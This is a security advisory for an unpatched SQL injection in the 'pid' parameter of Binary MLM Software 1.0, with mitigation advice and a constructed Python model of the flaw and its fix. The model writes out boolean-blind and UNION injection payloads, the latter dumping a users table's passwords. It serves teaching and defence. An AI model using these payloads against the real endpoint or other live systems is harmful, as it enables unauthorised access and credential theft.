Vendor: Binary MLM Software
By: Ihsan Sencan
CVSS: 7.5 (HIGH)
Type: SQL Injection
CWE: 89
Product Name: Binary MLM Software
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: NO
Related CWE: N/A
CPE: a:mlmsoftwarez.in:binary_mlm_software:1.0
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: WiN7_x64/KaLiLinuX_x64
Year: 2018
Binary MLM Software 1.0 – ‘pid’ SQL Injection
An unauthenticated attacker can inject arbitrary SQL through the 'pid' parameter of the 'tree.php' script, which is used in a database query without type validation or parameter binding. The flaw is exploitable with standard techniques such as UNION-based and boolean-based blind extraction, allowing an attacker to read or modify application data and compromise the application. Escalation to operating-system command execution is possible only where the database account's privileges and the server configuration allow it (for example, file-write privileges on the database host); it does not follow from the injection alone.
Mitigation:
Use parameterized queries (prepared statements) for every query that incorporates request data, so that 'pid' is always bound as a value and never concatenated into the SQL text. In addition, validate and type-check user-supplied input before it reaches the database layer: 'pid' is a numeric identifier, so it should be accepted only when it is an integer and rejected otherwise. Input filtering on its own is not a sufficient defence; it is a second layer alongside parameterization. Running the application's database account with least privilege limits what a successful injection can read or write.
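The following is an added example that is not part of the original advisory or of the Binary MLM Software code base. It models the described flaw and its fix in Python against an in-memory SQLite database: the `tree` and `users` tables, the column names, and the exact shape of the vulnerable query in `tree.php` (a numeric `pid` concatenated into a SELECT) are assumptions, since the page only states that the parameter is injectable. `lookup_tree_vulnerable` reproduces the concatenation pattern, `lookup_tree_safe` applies the mitigation above (integer validation plus a bound parameter), and the two probe functions run the boolean-based blind and UNION techniques named in the description against either implementation.

```python
"""Model of the 'pid' SQL injection and its fix, using an in-memory SQLite DB.

Constructed example: schema, sample rows and the vulnerable query shape are
assumptions standing in for the real tree.php, which is not shown on the page.
"""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Build a constructed sample schema: a binary-tree placement table and a
    users table that an injection could reach through the same connection."""
    con = sqlite3.connect(":memory:")
    con.executescript(
        """
        CREATE TABLE tree (pid INTEGER, member TEXT, side TEXT);
        INSERT INTO tree VALUES (1, 'alice', 'L'), (1, 'bob', 'R'), (2, 'carol', 'L');
        CREATE TABLE users (username TEXT, password TEXT);
        INSERT INTO users VALUES ('admin', 's3cr3t-hash');
        """
    )
    return con


def lookup_tree_vulnerable(con: sqlite3.Connection, pid: str) -> list:
    """Assumed shape of the flaw: the raw request parameter is spliced into
    the SQL text, so whatever arrives in 'pid' is parsed as SQL, not as a value."""
    sql = f"SELECT member, side FROM tree WHERE pid = {pid}"
    return con.execute(sql).fetchall()


def lookup_tree_safe(con: sqlite3.Connection, pid: str) -> list:
    """Hardened form: enforce the expected type (pid is an integer id) and
    bind it through a placeholder so the driver never treats it as SQL."""
    try:
        pid_int = int(pid)
    except ValueError:
        raise ValueError("pid must be an integer")
    return con.execute(
        "SELECT member, side FROM tree WHERE pid = ?", (pid_int,)
    ).fetchall()


def boolean_blind_differential(lookup, con: sqlite3.Connection) -> bool:
    """Boolean-based blind probe: a true and a false tautology appended to a
    valid pid produce different result sets only if the input reaches the SQL
    parser. Returns True when the endpoint behaves as injectable."""
    try:
        with_true = lookup(con, "1 AND 1=1")
        with_false = lookup(con, "1 AND 1=2")
    except ValueError:
        return False  # rejected by validation before any query ran
    return with_true != with_false


def union_dump(lookup, con: sqlite3.Connection) -> list:
    """UNION-based extraction: match the two-column SELECT and pull rows from
    another table. Raises ValueError against the hardened lookup."""
    return lookup(con, "0 UNION SELECT username, password FROM users")


if __name__ == "__main__":
    db = make_db()
    print("vulnerable injectable:", boolean_blind_differential(lookup_tree_vulnerable, db))
    print("hardened injectable:  ", boolean_blind_differential(lookup_tree_safe, db))
    print("union dump (vulnerable):", union_dump(lookup_tree_vulnerable, db))
```

The differential probe is the same logic a scanner or a manual tester applies to the real endpoint: two requests that differ only in a tautology, compared for any difference in the response. Against the hardened function the tautology never reaches the parser, because `int()` rejects it first, and even a string that did pass validation would be bound as an integer value rather than interpreted as SQL.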